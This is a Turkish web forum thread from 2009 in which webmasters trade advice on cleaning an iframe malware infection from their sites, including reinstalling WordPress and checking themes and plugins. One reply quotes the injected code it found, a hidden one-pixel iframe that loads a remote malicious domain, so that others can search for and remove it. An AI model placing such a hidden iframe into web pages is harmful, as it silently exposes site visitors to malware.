IFRAME Virüs uyarısı yardım.
19
●1.145
- 17-06-2009, 09:40:15chmod'u 444 yazıyorum gene 644'e dönüyor sinir şey.girye adlı üyeden alıntı: mesajı görüntüle
- 17-06-2009, 09:59:39Bilmiyorum ama /cpanel yazarak giriş yapıyorum.Akseki adlı üyeden alıntı: mesajı görüntüle
- 17-06-2009, 16:16:06Kimlik doğrulama veya yönetimden onay bekliyor.eğer sisteminiz wordpress ise wp-content hariç tüm dosyaları silin (wpye ait) virüssüz bir wp indirip tekrar atın.Daha sonra kullandığınız temanın dosyalarını inceleyin.image.php gibi dosya bile atabiliyor bu virüsler iframe,image.php en üstte şifrelenmiş bir kod gibi olabilir bu virüsler iyice inceleyin.Pluginleri es geçmeyi düşünmeyin bile oralarada bulaşmış olabilir pluginleri ya inceleyin yada plugin dosyaları bilgisayarınızda varsa yada orjinallerini indirecek vaktiniz varsa orjinalleri indirin ftpye atın.Virüs devam ederse bunlardan önce format atmanız gerekecek.
Ben 2 gün uğraştım php şeklinde iframe ve image.php şekillerinde bulaşmıştı virüs :@
Gumblar.cn Ftp virüsünden kurtulma (Çözüm) | AktifBlog - Sevimli blog kahramanı! - 18-06-2009, 22:22:12Aslında hocam hepsini atsanda olur. Farkı yok.SrCn adlı üyeden alıntı: mesajı görüntüle
- 18-06-2009, 22:29:48Üyeliği durdurulduAynı sorun kuzenimin başına gelmişti.Onun sorununu şöyle çözdüm.İlk önce "Advanced Find and Replace" programını indir.Sonra ftp'den public html deki bütün dosyaları indir.Daha sonra benim sitende tespit ettiğim iframe virüsü
"<iframe src="http://clifedo.net/?click=6A29B" width=1 height=1 style="visibility:hidden;position:absolute"></iframe>"
bu.Bunu programdan aratıp dosyaları bulacaksın.Büyük ihtimal dosyaların çoğunluğu index.html olacak.Onları yine program aracılığıyla silebilirsin.Zaten programın kullanımı kolay.
Programı çözemezsen https://www.r10.net/wordpress/362796-...temizleme.html burda anlatılıyor.

